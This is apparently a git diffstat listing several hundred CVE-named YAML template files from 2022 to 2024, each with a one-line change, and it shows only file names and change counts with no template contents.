http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45269.yaml | 2 +- http/cves/2022/CVE-2022-45362.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 2 +- http/cves/2022/CVE-2022-45699.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47501.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-48164.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48166.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2022/CVE-2022-4940.yaml | 2 +- http/cves/2023/CVE-2023-0099.yaml | 2 +- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0563.yaml | 2 +- http/cves/2023/CVE-2023-0676.yaml | 2 +- http/cves/2023/CVE-2023-0678.yaml | 2 +- http/cves/2023/CVE-2023-0876.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1315.yaml | 2 +- http/cves/2023/CVE-2023-1318.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1389.yaml | 2 +- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-1892.yaml | 2 +- http/cves/2023/CVE-2023-1893.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-2227.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22621.yaml | 2 +- http/cves/2023/CVE-2023-22893.yaml | 2 +- http/cves/2023/CVE-2023-2309.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23897.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2518.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25280.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-2624.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2734.yaml | 2 +- http/cves/2023/CVE-2023-27351.yaml | 2 +- http/cves/2023/CVE-2023-2745.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27584.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-27624.yaml | 2 +- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29204.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-29506.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30192.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30869.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-3188.yaml | 2 +- http/cves/2023/CVE-2023-32068.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33193.yaml | 2 +- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 2 +- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-3380.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-33960.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34133.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34754.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34990.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35156.yaml | 2 +- http/cves/2023/CVE-2023-35158.yaml | 2 +- http/cves/2023/CVE-2023-35160.yaml | 2 +- http/cves/2023/CVE-2023-35161.yaml | 2 +- http/cves/2023/CVE-2023-35162.yaml | 2 +- http/cves/2023/CVE-2023-3519.yaml | 2 +- http/cves/2023/CVE-2023-3521.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-3722.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- http/cves/2023/CVE-2023-37599.yaml | 2 +- http/cves/2023/CVE-2023-37645.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-37988.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38192.yaml | 2 +- http/cves/2023/CVE-2023-38194.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3846.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38879.yaml | 2 +- http/cves/2023/CVE-2023-38952.yaml | 2 +- http/cves/2023/CVE-2023-38964.yaml | 2 +- http/cves/2023/CVE-2023-38992.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39007.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39121.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39560.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39650.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-3990.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40211.yaml | 2 +- http/cves/2023/CVE-2023-40355.yaml | 2 +- http/cves/2023/CVE-2023-40748.yaml | 2 +- http/cves/2023/CVE-2023-40749.yaml | 2 +- http/cves/2023/CVE-2023-40750.yaml | 2 +- http/cves/2023/CVE-2023-40751.yaml | 2 +- http/cves/2023/CVE-2023-40752.yaml | 2 +- http/cves/2023/CVE-2023-40753.yaml | 2 +- http/cves/2023/CVE-2023-40755.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-4136.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-4151.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41597.yaml | 2 +- http/cves/2023/CVE-2023-41621.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41954.yaml | 2 +- http/cves/2023/CVE-2023-4284.yaml | 2 +- http/cves/2023/CVE-2023-43208.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43373.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-43472.yaml | 2 +- http/cves/2023/CVE-2023-44012.yaml | 2 +- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44352.yaml | 2 +- http/cves/2023/CVE-2023-44353.yaml | 2 +- http/cves/2023/CVE-2023-44393.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-44812.yaml | 2 +- http/cves/2023/CVE-2023-4490.yaml | 2 +- http/cves/2023/CVE-2023-45038.yaml | 2 +- http/cves/2023/CVE-2023-4521.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 2 +- http/cves/2023/CVE-2023-45671.yaml | 2 +- http/cves/2023/CVE-2023-45826.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-45855.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46455.yaml | 2 +- http/cves/2023/CVE-2023-46732.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-46818.yaml | 2 +- http/cves/2023/CVE-2023-47115.yaml | 2 +- http/cves/2023/CVE-2023-47117.yaml | 2 +- http/cves/2023/CVE-2023-47684.yaml | 2 +- http/cves/2023/CVE-2023-47873.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-48777.yaml | 2 +- http/cves/2023/CVE-2023-49489.yaml | 2 +- http/cves/2023/CVE-2023-49494.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 2 +- http/cves/2023/CVE-2023-50578.yaml | 2 +- http/cves/2023/CVE-2023-50719.yaml | 2 +- http/cves/2023/CVE-2023-50720.yaml | 2 +- http/cves/2023/CVE-2023-52085.yaml | 2 +- http/cves/2023/CVE-2023-5222.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 2 +- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 2 +- http/cves/2023/CVE-2023-5558.yaml | 2 +- http/cves/2023/CVE-2023-5559.yaml | 2 +- http/cves/2023/CVE-2023-5561.yaml | 2 +- http/cves/2023/CVE-2023-5815.yaml | 2 +- http/cves/2023/CVE-2023-5830.yaml | 2 +- http/cves/2023/CVE-2023-5863.yaml | 2 +- http/cves/2023/CVE-2023-6000.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6023.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6266.yaml | 2 +- http/cves/2023/CVE-2023-6275.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6421.yaml | 2 +- http/cves/2023/CVE-2023-6505.yaml | 2 +- http/cves/2023/CVE-2023-6568.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-6655.yaml | 2 +- http/cves/2023/CVE-2023-6697.yaml | 2 +- http/cves/2023/CVE-2023-6786.yaml | 2 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2023/CVE-2023-6977.yaml | 2 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 2 +- http/cves/2023/CVE-2023-7116.yaml | 2 +- http/cves/2023/CVE-2023-7164.yaml | 2 +- http/cves/2023/CVE-2023-7246.yaml | 2 +- http/cves/2024/CVE-2024-0200.yaml | 2 +- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0250.yaml | 2 +- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0593.yaml | 2 +- http/cves/2024/CVE-2024-0692.yaml | 2 +- http/cves/2024/CVE-2024-0799.yaml | 2 +- http/cves/2024/CVE-2024-0801.yaml | 2 +- http/cves/2024/CVE-2024-0881.yaml | 2 +- http/cves/2024/CVE-2024-0939.yaml | 2 +- http/cves/2024/CVE-2024-10081.yaml | 2 +- http/cves/2024/CVE-2024-10146.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 2 +- http/cves/2024/CVE-2024-10708.yaml | 2 +- http/cves/2024/CVE-2024-10783.yaml | 2 +- http/cves/2024/CVE-2024-10812.yaml | 2 +- http/cves/2024/CVE-2024-10908.yaml | 2 +- http/cves/2024/CVE-2024-10914.yaml | 2 +- http/cves/2024/CVE-2024-11238.yaml | 2 +- http/cves/2024/CVE-2024-11303.yaml | 2 +- http/cves/2024/CVE-2024-11320.yaml | 2 +- http/cves/2024/CVE-2024-11396.yaml | 2 +- http/cves/2024/CVE-2024-11587.yaml | 2 +- http/cves/2024/CVE-2024-11740.yaml | 2 +- http/cves/2024/CVE-2024-1183.yaml | 2 +- http/cves/2024/CVE-2024-11921.yaml | 2 +- http/cves/2024/CVE-2024-11972.yaml | 2 +- http/cves/2024/CVE-2024-1209.yaml | 2 +- http/cves/2024/CVE-2024-12987.yaml | 2 +- http/cves/2024/CVE-2024-13126.yaml | 2 +- http/cves/2024/CVE-2024-13160.yaml | 2 +- http/cves/2024/CVE-2024-13161.yaml | 2 +- http/cves/2024/CVE-2024-13322.yaml | 2 +- http/cves/2024/CVE-2024-13496.yaml | 2 +- http/cves/2024/CVE-2024-13624.yaml | 2 +- http/cves/2024/CVE-2024-13726.yaml | 2 +- http/cves/2024/CVE-2024-13853.yaml | 2 +- http/cves/2024/CVE-2024-13888.yaml | 2 +- http/cves/2024/CVE-2024-13979.yaml | 2 +- http/cves/2024/CVE-2024-1483.yaml | 2 +- http/cves/2024/CVE-2024-1561.yaml | 2 +- http/cves/2024/CVE-2024-20404.yaml | 2 +- http/cves/2024/CVE-2024-20419.yaml | 2 +- http/cves/2024/CVE-2024-20439.yaml | 2 +- http/cves/2024/CVE-2024-2053.yaml | 2 +- http/cves/2024/CVE-2024-20767.yaml | 2 +- http/cves/2024/CVE-2024-21136.yaml | 2 +- http/cves/2024/CVE-2024-21485.yaml | 2 +- http/cves/2024/CVE-2024-21644.yaml | 2 +- http/cves/2024/CVE-2024-21645.yaml | 2 +- http/cves/2024/CVE-2024-21650.yaml | 2 +- http/cves/2024/CVE-2024-21683.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-22207.yaml | 2 +- http/cves/2024/CVE-2024-22319.yaml | 2 +- http/cves/2024/CVE-2024-22320.yaml | 2 +- http/cves/2024/CVE-2024-23334.yaml | 2 +- http/cves/2024/CVE-2024-2340.yaml | 2 +- http/cves/2024/CVE-2024-24112.yaml | 2 +- http/cves/2024/CVE-2024-24131.yaml | 2 +- http/cves/2024/CVE-2024-24565.yaml | 2 +- http/cves/2024/CVE-2024-2473.yaml | 2 +- http/cves/2024/CVE-2024-24759.yaml | 2 +- http/cves/2024/CVE-2024-24763.yaml | 2 +- http/cves/2024/CVE-2024-24809.yaml | 2 +- http/cves/2024/CVE-2024-24882.yaml | 2 +- http/cves/2024/CVE-2024-25608.yaml | 2 +- http/cves/2024/CVE-2024-25723.yaml | 2 +- http/cves/2024/CVE-2024-25735.yaml | 2 +- http/cves/2024/CVE-2024-25852.yaml | 2 +- http/cves/2024/CVE-2024-2621.yaml | 2 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27564.yaml | 2 +- http/cves/2024/CVE-2024-2771.yaml | 2 +- http/cves/2024/CVE-2024-27718.yaml | 2 +- http/cves/2024/CVE-2024-2782.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-28200.yaml | 2 +- http/cves/2024/CVE-2024-28253.yaml | 2 +- http/cves/2024/CVE-2024-28397.yaml | 2 +- http/cves/2024/CVE-2024-2862.yaml | 2 +- http/cves/2024/CVE-2024-28623.yaml | 2 +- http/cves/2024/CVE-2024-2863.yaml | 2 +- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-29028.yaml | 2 +- http/cves/2024/CVE-2024-29137.yaml | 2 +- http/cves/2024/CVE-2024-29138.yaml | 2 +- http/cves/2024/CVE-2024-29198.yaml | 2 +- http/cves/2024/CVE-2024-29269.yaml | 2 +- http/cves/2024/CVE-2024-29272.yaml | 2 +- http/cves/2024/CVE-2024-2928.yaml | 2 +- http/cves/2024/CVE-2024-29792.yaml | 2 +- http/cves/2024/CVE-2024-29824.yaml | 2 +- http/cves/2024/CVE-2024-29868.yaml | 2 +- http/cves/2024/CVE-2024-29889.yaml | 2 +- http/cves/2024/CVE-2024-29931.yaml | 2 +- http/cves/2024/CVE-2024-29972.yaml | 2 +- http/cves/2024/CVE-2024-29973.yaml | 2 +- http/cves/2024/CVE-2024-30163.yaml | 2 +- http/cves/2024/CVE-2024-30194.yaml | 2 +- http/cves/2024/CVE-2024-30269.yaml | 2 +- http/cves/2024/CVE-2024-3032.yaml | 2 +- http/cves/2024/CVE-2024-30569.yaml | 2 +- http/cves/2024/CVE-2024-30570.yaml | 2 +- http/cves/2024/CVE-2024-3097.yaml | 2 +- http/cves/2024/CVE-2024-3136.yaml | 2 +- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-31982.yaml | 2 +- http/cves/2024/CVE-2024-32113.yaml | 2 +- http/cves/2024/CVE-2024-32231.yaml | 2 +- http/cves/2024/CVE-2024-32238.yaml | 2 +- http/cves/2024/CVE-2024-3234.yaml | 2 +- http/cves/2024/CVE-2024-32399.yaml | 2 +- http/cves/2024/CVE-2024-32651.yaml | 2 +- http/cves/2024/CVE-2024-3273.yaml | 2 +- http/cves/2024/CVE-2024-32735.yaml | 2 +- http/cves/2024/CVE-2024-32737.yaml | 2 +- http/cves/2024/CVE-2024-32738.yaml | 2 +- http/cves/2024/CVE-2024-32964.yaml | 2 +- http/cves/2024/CVE-2024-3300.yaml | 2 +- http/cves/2024/CVE-2024-33113.yaml | 2 +- http/cves/2024/CVE-2024-33326.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 2 +- http/cves/2024/CVE-2024-33605.yaml | 2 +- http/cves/2024/CVE-2024-33610.yaml | 2 +- http/cves/2024/CVE-2024-33939.yaml | 2 +- http/cves/2024/CVE-2024-3400.yaml | 2 +- http/cves/2024/CVE-2024-34061.yaml | 2 +- http/cves/2024/CVE-2024-34257.yaml | 2 +- http/cves/2024/CVE-2024-3469.yaml | 2 +- http/cves/2024/CVE-2024-34982.yaml | 2 +- http/cves/2024/CVE-2024-35219.yaml | 2 +- http/cves/2024/CVE-2024-3552.yaml | 2 +- http/cves/2024/CVE-2024-35693.yaml | 2 +- http/cves/2024/CVE-2024-35694.yaml | 2 +- http/cves/2024/CVE-2024-36675.yaml | 2 +- http/cves/2024/CVE-2024-36683.yaml | 2 +- http/cves/2024/CVE-2024-36837.yaml | 2 +- http/cves/2024/CVE-2024-36857.yaml | 2 +- http/cves/2024/CVE-2024-3742.yaml | 2 +- http/cves/2024/CVE-2024-3753.yaml | 2 +- http/cves/2024/CVE-2024-37656.yaml | 2 +- http/cves/2024/CVE-2024-37728.yaml | 2 +- http/cves/2024/CVE-2024-37881.yaml | 2 +- http/cves/2024/CVE-2024-3822.yaml | 2 +- http/cves/2024/CVE-2024-38288.yaml | 2 +- http/cves/2024/CVE-2024-38353.yaml | 2 +- http/cves/2024/CVE-2024-38472.yaml | 2 +- http/cves/2024/CVE-2024-3848.yaml | 2 +- http/cves/2024/CVE-2024-3850.yaml | 2 +- http/cves/2024/CVE-2024-39646.yaml | 2 +- http/cves/2024/CVE-2024-39887.yaml | 2 +- http/cves/2024/CVE-2024-39903.yaml | 2 +- http/cves/2024/CVE-2024-39907.yaml | 2 +- http/cves/2024/CVE-2024-39914.yaml | 2 +- http/cves/2024/CVE-2024-40348.yaml | 2 +- http/cves/2024/CVE-2024-40711.yaml | 2 +- http/cves/2024/CVE-2024-41667.yaml | 2 +- http/cves/2024/CVE-2024-4180.yaml | 2 +- http/cves/2024/CVE-2024-41810.yaml | 2 +- http/cves/2024/CVE-2024-41955.yaml | 2 +- http/cves/2024/CVE-2024-42009.yaml | 2 +- http/cves/2024/CVE-2024-4257.yaml | 2 +- http/cves/2024/CVE-2024-42852.yaml | 2 +- http/cves/2024/CVE-2024-43160.yaml | 2 +- http/cves/2024/CVE-2024-4325.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 2 +- http/cves/2024/CVE-2024-4358.yaml | 2 +- http/cves/2024/CVE-2024-43917.yaml | 2 +- http/cves/2024/CVE-2024-43971.yaml | 2 +- http/cves/2024/CVE-2024-44349.yaml | 2 +- http/cves/2024/CVE-2024-4439.yaml | 2 +- http/cves/2024/CVE-2024-4455.yaml | 2 +- http/cves/2024/CVE-2024-44762.yaml | 2 +- http/cves/2024/CVE-2024-44849.yaml | 2 +- http/cves/2024/CVE-2024-45216.yaml | 2 +- http/cves/2024/CVE-2024-45241.yaml | 2 +- http/cves/2024/CVE-2024-45293.yaml | 2 +- http/cves/2024/CVE-2024-45309.yaml | 2 +- http/cves/2024/CVE-2024-45388.yaml | 2 +- http/cves/2024/CVE-2024-45440.yaml | 2 +- http/cves/2024/CVE-2024-45507.yaml | 2 +- http/cves/2024/CVE-2024-45622.yaml | 2 +- http/cves/2024/CVE-2024-4577.yaml | 2 +- http/cves/2024/CVE-2024-46506.yaml | 2 +- http/cves/2024/CVE-2024-46627.yaml | 2 +- http/cves/2024/CVE-2024-47073.yaml | 2 +- http/cves/2024/CVE-2024-47308.yaml | 2 +- http/cves/2024/CVE-2024-47533.yaml | 2 +- http/cves/2024/CVE-2024-4836.yaml | 2 +- http/cves/2024/CVE-2024-4841.yaml | 2 +- http/cves/2024/CVE-2024-48455.yaml | 2 +- http/cves/2024/CVE-2024-4940.yaml | 2 +- http/cves/2024/CVE-2024-49757.yaml | 2 +- http/cves/2024/CVE-2024-50334.yaml | 2 +- http/cves/2024/CVE-2024-50477.yaml | 2 +- http/cves/2024/CVE-2024-5057.yaml | 2 +- http/cves/2024/CVE-2024-5082.yaml | 2 +- http/cves/2024/CVE-2024-5084.yaml | 2 +- http/cves/2024/CVE-2024-50857.yaml | 2 +- http/cves/2024/CVE-2024-51228.yaml | 2 +- http/cves/2024/CVE-2024-51378.yaml | 2 +- http/cves/2024/CVE-2024-51482.yaml | 2 +- http/cves/2024/CVE-2024-51739.yaml | 2 +- http/cves/2024/CVE-2024-51978.yaml | 2 +- http/cves/2024/CVE-2024-5217.yaml | 2 +- http/cves/2024/CVE-2024-5230.yaml | 2 +- http/cves/2024/CVE-2024-52762.yaml | 2 +- http/cves/2024/CVE-2024-52763.yaml | 2 +- http/cves/2024/CVE-2024-5315.yaml | 2 +- http/cves/2024/CVE-2024-5334.yaml | 2 +- http/cves/2024/CVE-2024-53991.yaml | 2 +- http/cves/2024/CVE-2024-53995.yaml | 2 +- http/cves/2024/CVE-2024-5421.yaml | 2 +- http/cves/2024/CVE-2024-54330.yaml | 2 +- http/cves/2024/CVE-2024-54763.yaml | 2 +- http/cves/2024/CVE-2024-54764.yaml | 2 +- http/cves/2024/CVE-2024-54767.yaml | 2 +- http/cves/2024/CVE-2024-55218.yaml | 2 +- http/cves/2024/CVE-2024-55416.yaml | 2 +- http/cves/2024/CVE-2024-55550.yaml | 2 +- http/cves/2024/CVE-2024-55591.yaml | 2 +- http/cves/2024/CVE-2024-55956.yaml | 2 +- http/cves/2024/CVE-2024-56159.yaml | 2 +- http/cves/2024/CVE-2024-56325.yaml | 2 +- http/cves/2024/CVE-2024-56512.yaml | 2 +- http/cves/2024/CVE-2024-57045.yaml | 2 +- http/cves/2024/CVE-2024-57049.yaml | 2 +- http/cves/2024/CVE-2024-57514.yaml | 2 +- http/cves/2024/CVE-2024-57727.yaml | 2 +- http/cves/2024/CVE-2024-58136.yaml | 2 +- 